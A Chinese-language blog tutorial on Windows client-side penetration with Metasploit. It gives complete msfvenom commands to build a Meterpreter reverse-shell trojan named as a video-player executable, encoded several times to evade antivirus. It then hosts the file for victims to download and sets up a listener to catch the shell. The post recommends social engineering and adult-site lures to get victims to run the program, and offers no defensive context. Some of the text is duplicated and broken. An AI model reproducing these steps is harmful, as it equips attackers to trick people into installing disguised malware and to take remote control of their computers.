基于Windows客户端渗透

最新推荐文章于 2023-06-01 08:07:09 发布
最新推荐文章于 2023-06-01 08:07:09 发布
阅读量400 收藏
点赞数
文章标签: windows linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62803993/article/details/128766228
版权

基于Windows客户端渗透

客户端渗透原理

在我们无法突破对方的网络边界时,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档,pdf文件。想要达到效果同时也要利用好社会工程学,来诱惑受害者执行恶意程序。

由于有杀毒软件,所以我们可以利用颜色网站或者免杀来躲避查杀。

免杀可以通过修改二进制特征字符或者进行加密。

实战

制作Windows恶意软件获取shell

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

生成xx影音.exe后门程序
使用一个编码器

命令:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/xx影音1.exe

img

使用两个编码器进一步加强免杀能力

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/xx影音2.exe

img

参数说明

-a 指定架构,如:x86和x64,x86代表32位,x64代表64位。

–platform 指定平台,这里选择windows,通过 --l platforms可以查看所有支持的平台

-p 设置攻击载荷

-b 去掉坏字符,坏字符会影响payload的正常执行

启动apache2

命令:systemctl start apache2

去目标机浏览,点击下载打开即可

命令:

img

回到kali,开启监听

命令:msf

进入multi/handler模块

img

设置payload

命令:set payload windows/meterpreter/reverse_http

img

设置用于接受从目标机弹回的shell

img

开始攻击

命令:run

ell

[外链图片转存中…(img-XISI9keB-1674722619984)]

开始攻击

命令:run

img

茶十三
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PC客户端(cs架构)渗透测试
06-19
PC客户端(cs架构)渗透测试,本项目主要针对pc客户端(cs架构)渗透测试,结合自身测试经验和网络资料形成checklist,如有任何问题,欢迎联系,期待大家贡献更多的技巧和案例。
渗透测试-内网客户端渗透.pdf
02-25
《Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
《metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透
Donald Liang 的专栏
04-06 1099
四.客户端攻击      客户端攻击与服务端攻击有个显著不同的标识,就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出,而是需要结合一些社会工程学技巧,诱使客户端用户去访问这些恶意数据,间接发生攻击。      4.1客户端渗透攻击的安全防护机制              ①DEP                 DEP(数据执行保护)基本原理是操作系统
客户端渗透之——浏览器渗透
冰河的专栏
01-24 2150
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86632106 攻击机: Kali 192.168.175.128 靶机: WinXP 192.168.175.130 1.Browser autopwn攻击 Metasploit中提供了一个browser autopwn模块,这是一个可以用来对各种浏览器进行测试和渗透的自...
metasploit之客户端渗透
zkwniky的博客
09-05 1254
0x00 概要 我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们想目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来欺骗对方,使其中招。 这篇文章中我们主要会使用到metasploit中的msfvenom这个工具,如果大家对msfvenom这个工具不了解的话可以参考我这篇博客:metasploit
C++课程设计-基于反弹Socket通信的windows系统后门实现.doc
07-11
3.Socket 通信的概念和应用:Socket 通信是指在客户端服务器之间进行数据传输的方式,基于反弹 Socket 通信的 Windows 系统后门程序使用 C/S socket 通信,反弹连接由客户端主动去连接服务端。 4. 注册表操作和...
c++课程设计基于反弹socket通信的windows系统后门实现-毕业论文.doc
07-04
基于反弹 Socket 通信的 Windows 系统后门程序是典型的恶意后门程序,在渗透测试过程中,可以获取目标服务器的系统权限,并可以进一步进行信息搜集和渗透内网里的其他网络。 2. 后门程序的组成部分 后门程序分为三...
c--课程设计基于反弹socket通信的windows系统后门实现-毕业论文.doc
07-11
基于反弹 Socket 通信的 Windows 系统后门实现 本文主要介绍了基于反弹 Socket 通信的 Windows 系统后门实现,包括需求分析、功能简介、总体设计、详细设计等几个方面的内容。 需求分析 在渗透测试过程中,获取...
基于手机Android平台的虚拟校园漫游系统的应用前景.pdf
09-21
随着科技的发展,智能手机已经渗透到我们生活的各个角落。本文探讨了在手机Android平台上构建虚拟校园漫游系统的技术与应用前景。虚拟校园漫游系统旨在利用先进的虚拟现实技术,帮助用户更准确地定位校园内的位置,...
渗透测试笔记总结(七)——内网客户端渗透
Leon~博客
02-26 608
目录 一、客户端渗透 3、安全防护机制 二、针对浏览器的渗透攻击 1、堆喷射利用 2、msf中的浏览器攻击 三、浏览器攻击实例——ms11-050漏洞 四、浏览器第三方插件攻击——ActiveX 五、常见应用软件的渗透 1、内存攻击技术ROP 2、msf中的自动化fileformat攻击 3、对office软件的渗透—...
Metasploit(3) 渗透测试之通过客户端进行渗透
weixin_41182861的博客
07-23 1028
客户端渗透测试原理 在我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。 客户端渗透技巧,通常用户的计算机都安装了安全软件,一般我们生成的恶意程序都会被检测,所以我们所设计的恶意软件可以利用人的劣根性,比如我们将恶意软件或网站伪装成色情软件或网站,这样目标会认为他本身就是不好的软件被安全软件检测是很正常的事情,如果他安耐不住关闭安全防护软件
客户端渗透攻击基础知识-渗透测试模拟环境(8)
AI
06-01 653
客户端渗透攻击(Client-side Exploit)指的是攻击者构造畸形数据发送给目标主机用户在使用含有漏洞缺陷的客户端应用程序处理这些数据时,发生程序内部处理流程的错误,执行了内嵌于数据中的恶意代码,从而导致被渗透入侵。这类攻击针对的是应用软件处于客户端一侧的软件程序,最常见的是以浏览器、Ofice 为代表的流行应用软件。此类攻击威胁巨大,特别是由于用户安全意识的参差不齐以及电子商务的快速发展,直接针对用户个人主机的客户端渗透攻击,也越来越多地受到攻击者的青睐。
利用 0day 双杀-java 环境-宏感染-安卓客户端渗透
weixin_46035615的博客
04-26 3411
利用 0day 双杀-java 环境-宏感染-安卓客户端渗透 1 实战-利用 0DAY 漏洞获取 shell 2 实战-基于 java 环境的漏洞利用获取 shell 3 实战-利用宏感染 word 文档获取 shell 4 安卓客户端渗透
制作windows客户端恶意软件进行渗透
m0_56988395的博客
02-20 982
目录 工具 靶机 客户端渗透原理 制作Windows恶意软件获取shell 工具 Metasploit 靶机 windows 2008 r2 相信大多数网友都是下载的虚拟机,所以请设置成桥接模式,确保位于同一网段 注:以下内容仅供学习交流,请勿用于非法用途 客户端渗透原理 在我们无法突破对方的网络边界时,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档,pdf文件。想要达到效果同时也要利用好社会工程学,来诱惑受害
Windows网络服务渗透测试实战-MS08-067
c_lanxiaofang的博客
05-18 632
一、实验项目名称 Windows网络服务渗透测试实战-MS08-067 二、实验目的及要求 掌握对MS08-067漏洞攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 复现环境 靶机:windows xp sp3 IP:192.168.232.128 攻击机:kali-linux-2021.3 IP:192.168.232.141 复现流程 sudo msfconsole 扫描目标靶机 nmap -sS 192.168.232.12.
Windows网络服务渗透测试实战`MS17-010漏洞复现的学习
GUN_C的博客
11-14 1012
永恒之蓝,渗透基础
基于windows server的简单内网渗透
weixin_55541277的博客
06-09 2284
记录简单的基于windows server搭建的内网渗透靶场
客户端渗透介绍(一):GUI测试
systemino的博客
06-04 492
BetaFast是一款集合了诸多漏洞的厚客户端,对于我们练习安全技术是很不错的。 故事起源 几年前,一个NetSPI安全顾问进入了我们的地下室,想要从仓库中找一些无指手套。地下室的过道几乎没有灯光,四处散落着一些杂物,突然一台设备引起了他的注意力。在一堆乱七八糟的满是灰尘的盒子和年久失修的转椅后面,那台设备上居然还有一个终端在闪烁着。 NetSPI一支最优秀的团队觉得很有意思,于是决定开始研究它。这台设备是一家叫BetaFast的公司创建的,这家公司早就已经倒闭了。这台设备的唯一目的就是分发Bet
windows客户端开发
最新发布
08-05
例如,Windows版的QQ、PPTV、浏览器程序(如Chrome、IE、FireFox、Safari)以及一些应用程序(如QQ音乐、迅雷、YY语音)都属于Windows客户端软件的范畴。 然而,在讨论Windows客户端开发时,并不包括使用.NET和C#...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值